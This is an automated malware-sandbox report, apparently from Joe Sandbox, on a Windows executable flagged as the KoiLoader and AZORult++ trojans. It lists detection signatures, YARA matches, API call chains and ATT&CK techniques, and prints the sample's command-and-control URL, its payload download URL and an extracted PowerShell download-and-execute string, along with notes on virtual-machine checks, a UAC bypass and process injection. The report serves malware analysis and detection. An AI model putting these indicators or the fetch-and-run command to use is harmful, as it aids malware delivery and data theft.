
Windows Analysis Report
www.italialife24.it.exe

Overview

General Information

Sample name: www.italialife24.it.exe
Analysis ID: 1567207
MD5: 0f744f4aaa3157117ed49660ff19c0be
SHA1: 0ca55d4cc76e0aeb2049d72fd7e088812e8913d6
SHA256: bcf349409a0111d7179994c408f6d02d325fb64647d56d5bd158aadfc0a88211
Tags: exe, www-italialife24-it, user-JAMESWT_MHT

Detection

AZORult++, KoiLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected AZORult++ Trojan
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • www.italialife24.it.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\www.italialife24.it.exe" MD5: 0F744F4AAA3157117ED49660FF19C0BE)
  • cleanup
Malware configuration (KoiLoader): {"C2": "http://195.123.217.43/oversate.php", "Payload url": "https://www.italialife24.it/wp-content/uploads/2021/05"}

Yara matches in memory dumps (Source | Rule | Description | Author):
00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_KoiLoader_1 | Yara detected KoiLoader | Joe Security
00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_KoiLoader_1 | Yara detected KoiLoader | Joe Security
00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Process Memory Space: www.italialife24.it.exe PID: 7400 | JoeSecurity_KoiLoader_1 | Yara detected KoiLoader | Joe Security

Yara matches in unpacked PE files (Source | Rule | Description | Author):
0.2.www.italialife24.it.exe.7617d0.2.unpack | JoeSecurity_KoiLoader_1 | Yara detected KoiLoader | Joe Security
0.2.www.italialife24.it.exe.7617d0.2.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.2.www.italialife24.it.exe.600000.1.unpack | JoeSecurity_KoiLoader_1 | Yara detected KoiLoader | Joe Security
0.2.www.italialife24.it.exe.600000.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.2.www.italialife24.it.exe.600000.1.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x1848:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x9bf6:$s1: CoGetObject

No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: www.italialife24.it.exe | Avira: detected
Source: 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: KoiLoader {"C2": "http://195.123.217.43/oversate.php", "Payload url": "https://www.italialife24.it/wp-content/uploads/2021/05"}
Source: www.italialife24.it.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: www.italialife24.it.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00608710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_00608710
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006093A0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_006093A0

Exploits

Source: Yara match | File source: 0.2.www.italialife24.it.exe.7617d0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: www.italialife24.it.exe PID: 7400, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00607300 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,0_2_00607300

Compliance

Source: C:\Users\user\Desktop\www.italialife24.it.exe | Unpacked PE file: 0.2.www.italialife24.it.exe.600000.1.unpack
Source: www.italialife24.it.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: www.italialife24.it.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004B993E
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006089F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0

Networking

Source: Malware configuration extractor | URLs: http://195.123.217.43/oversate.php
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00606850 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00606850
Source: www.italialife24.it.exe | String found in binary or memory: http://195.123.217.43/oversate.php
Source: www.italialife24.it.exe, 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, www.italialife24.it.exe, 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://195.123.217.43/oversate.php%temp%
Source: www.italialife24.it.exe | String found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05
Source: www.italialife24.it.exe, 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, www.italialife24.it.exe, 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/c

E-Banking Fraud

Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00609240 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_00609240

System Summary

Source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00605C90 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00605C90
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00605FF0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_00605FF0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004BFBC1
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00607C30
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006026D0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00607730
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006043F0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006047F0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: String function: 004B50E0 appears 33 times
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: String function: 004B3CE0 appears 82 times
Source: www.italialife24.it.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine | Classification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00606390 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00606390
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00606C80 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,0_2_00606C80
Source: www.italialife24.it.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: www.italialife24.it.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Section loaded: uxtheme.dll
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: www.italialife24.it.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: www.italialife24.it.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: www.italialife24.it.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: www.italialife24.it.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: www.italialife24.it.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: www.italialife24.it.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: www.italialife24.it.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\www.italialife24.it.exe | Unpacked PE file: 0.2.www.italialife24.it.exe.600000.1.unpack
Source: Yara match | File source: 0.2.www.italialife24.it.exe.7617d0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.www.italialife24.it.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.www.italialife24.it.exe.7617d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1666545303.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: www.italialife24.it.exe PID: 7400, type: MEMORYSTR
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_004B1300
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004C02D1 push ecx; ret 0_2_004C02E4

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_006089F0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-11363
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_0-11544
Source: C:\Users\user\Desktop\www.italialife24.it.exe | File opened / queried: C:\Windows\System32\VBoxService.exe
Source: C:\Users\user\Desktop\www.italialife24.it.exe | API coverage: 9.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004B993E
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006089F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0
Source: www.italialife24.it.exe | Binary or memory string: Hyper-V
Source: www.italialife24.it.exe, 00000000.00000002.1666624481.000000000073E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: POST%s|%s|eP8Tk5K9Start%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.43/oversate.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.italialife24.it/wp-content/uploads/2021/05/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: www.italialife24.it.exe | Binary or memory string: VMWare
Source: www.italialife24.it.exe | Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: www.italialife24.it.exe | Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\www.italialife24.it.exe | API call chain: ExitProcess graph end node graph_0-11462
Source: C:\Users\user\Desktop\www.italialife24.it.exe | API call chain: ExitProcess graph end node graph_0-11680
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B76CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B76CB
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_004B1300
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B1710 mov ecx, dword ptr fs:[00000030h] 0_2_004B1710
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00607940 mov eax, dword ptr fs:[00000030h] 0_2_00607940
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00605FF0 mov eax, dword ptr fs:[00000030h] 0_2_00605FF0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004BB779 GetProcessHeap,0_2_004BB779
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B5016 SetUnhandledExceptionFilter,0_2_004B5016
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B49BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004B49BE
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B76CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B76CB
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B4E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B4E89

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_00605C90 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00605C90
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe 0_2_006094A0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_006094A0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_006094A0
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B5125 cpuid 0_2_004B5125
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_004B4D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004B4D70
Source: C:\Users\user\Desktop\www.italialife24.it.exe | Code function: 0_2_006089F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_006089F0
MITRE ATT&CK Matrix

Matched techniques by tactic (the digits in front of each technique are the report's signature-count badges, reproduced as extracted):

Execution: 21 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 DLL Side-Loading; 1 Bypass User Account Control
Defense Evasion: 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control
Discovery: 1 System Time Discovery; 231 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 112 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 2 Encrypted Channel; 1 Ingress Tool Transfer; 1 Application Layer Protocol

